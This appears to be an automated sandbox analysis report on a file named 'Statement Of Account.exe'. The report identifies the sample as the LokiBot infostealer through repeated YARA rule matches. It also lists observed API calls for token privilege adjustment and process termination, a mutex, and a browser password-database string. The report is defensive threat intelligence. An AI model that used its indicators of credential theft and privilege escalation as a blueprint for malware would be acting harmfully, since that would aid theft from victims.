Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Statement Of Account.exe Static PE information: Section: UPX1 ZLIB complexity 0.9933401031783681
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/3@0/1
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044AF5C GetLastError,FormatMessageW, 0_2_0044AF5C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464422
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 3_2_00464422
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 3_2_004364AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 10_2_0040650A
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D517
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle, 0_2_0043701F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket, 0_2_0047A999
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043614F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess, 10_2_00123360
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess, 10_2_00123360
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Local\Temp\disimmure Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: svchost.exe, 0000000A.00000003.2139582226.0000000004D95000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Statement Of Account.exe ReversingLabs: Detection: 47%
Source: Statement Of Account.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\Statement Of Account.exe File read: C:\Users\user\Desktop\Statement Of Account.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
